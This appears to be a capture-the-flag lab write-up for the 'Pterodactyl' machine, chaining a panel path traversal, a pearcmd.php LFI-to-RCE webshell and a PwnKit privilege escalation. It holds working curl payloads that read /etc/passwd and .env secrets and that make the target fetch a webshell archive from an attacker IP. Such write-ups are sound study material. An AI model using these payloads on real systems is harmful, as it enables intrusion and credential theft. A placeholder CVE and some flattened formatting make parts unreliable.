| layout | default |
|---|---|
| title | Pterodactyl |
| parent | Insane Machines |
| grand_parent | Machines |
| permalink | /machines/insane/pterodactyl/ |
| Property | Value |
|---|---|
| OS | openSUSE Linux |
| Difficulty | Insane |
| Release | 2026-05-16 |
| Tags | #pterodactyl-panel #cve-2025-49132 #pear #pearcmd #lfi #pam #polkit #suse |
Pterodactyl targets the Pterodactyl game-server management panel running on openSUSE. The chain is:
- Directory traversal in the Pterodactyl panel (CVE-2025-49132) for arbitrary file read / panel takeover
- PEAR
pearcmd.phpLFI-to-RCE technique - register-argc-argv allowed in php.ini ->pearcmd.phpargument-injection produces a webshell - PAM / Polkit privilege escalation chain for root
openSUSE's path conventions and PAM stack differ from Debian/Ubuntu, complicating off-the-shelf techniques.
- CVE-2025-49132 - Pterodactyl panel path traversal in file management endpoint
- PEAR
pearcmd.phpLFI -> RCE (requiresregister_argc_argv = Onand PEAR installed) php.iniregister_argc_argvenablesargvto be read from URL query stringpearcmd.php install --installroot=/path/to/webroot package.tgzwrites attacker-controlledpackage.tgzcontent into webroot- PAM stack abuse on openSUSE (
/etc/pam.d/) - Polkit/pkexec known CVEs (
CVE-2021-4034PwnKit,CVE-2025-XXXper Pterodactyl patch state)
nmap -p- --min-rate=10000 -sV -sC pterodactyl.htb
# 22 ssh
# 443 https -> Pterodactyl PanelIdentify Pterodactyl version on /api/application or page metadata.
curl -sk "https://pterodactyl.htb/api/client/servers/<server-id>/files/contents?file=../../../../../../etc/passwd" \
-H "Authorization: Bearer <jwt>"Use traversal to read panel .env and recover APP_KEY, DB creds, and mail SMTP credentials.
register_argc_argv = On in php.ini means PHP populates $argv from the query string. When pearcmd.php is reachable via LFI, parameters become CLI args:
# Upload a malicious .tgz via attacker HTTP server containing a PHP webshell
python3 -m http.server 80
# Trigger LFI -> pearcmd.php with install command
curl -sk "https://pterodactyl.htb/?+config-create+/&file=/usr/share/pear/pearcmd.php&+install+-R+/var/www/html+http://10.10.14.5/pwn.tgz"
# Or argv-injection variant:
curl -sk "https://pterodactyl.htb/index.php?+install+-R+/var/www/html+http://10.10.14.5/pwn.tgz&file=/usr/share/pear/pearcmd.php"Browse to written webshell -> RCE as nginx/pterodactyl user.
Recover Pterodactyl DB credentials, MySQL dump for password hashes of admin users. Cracked or reused passwords pivot to a real OS user via SSH.
Enumerate openSUSE specifics:
ls -la /etc/pam.d/
cat /etc/pam.d/common-auth-pc
# Look for misconfigured "auth sufficient pam_listfile.so" or world-writable conf
pkexec --version
# 0.120 -> PwnKit CVE-2021-4034 if unpatchedPwnKit:
git clone https://github.com/berdav/CVE-2021-4034 && cd CVE-2021-4034
make && ./cve-2021-4034
# euid=0If PwnKit is patched, look for polkit rules (/etc/polkit-1/rules.d/) granting wheel-group org.freedesktop.systemd1.manage-units or similar, then start a malicious systemd user-service.
register_argc_argv = On+ reachablepearcmd.php= guaranteed RCE primitive. This is a 2018-era trick still landing on 2026 Insane boxes.- Pterodactyl is widely deployed for game-server hosting; its file-management endpoints are a high-value target.
- openSUSE breaks assumptions: Polkit, PAM, default paths all differ from Debian/Ubuntu. Always read
/etc/os-releasefirst. - PwnKit (CVE-2021-4034) remains one of the most reliable Linux LPEs in 2026 due to slow patching cadence on niche distros.
- PEAR
pearcmd.phpLFI-to-RCE technique: https://www.synacktiv.com/publications/exploiting-php-phar-deserialization-vulnerabilities-part-1.html (related) - Pterodactyl Panel: https://pterodactyl.io/
- PwnKit CVE-2021-4034: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034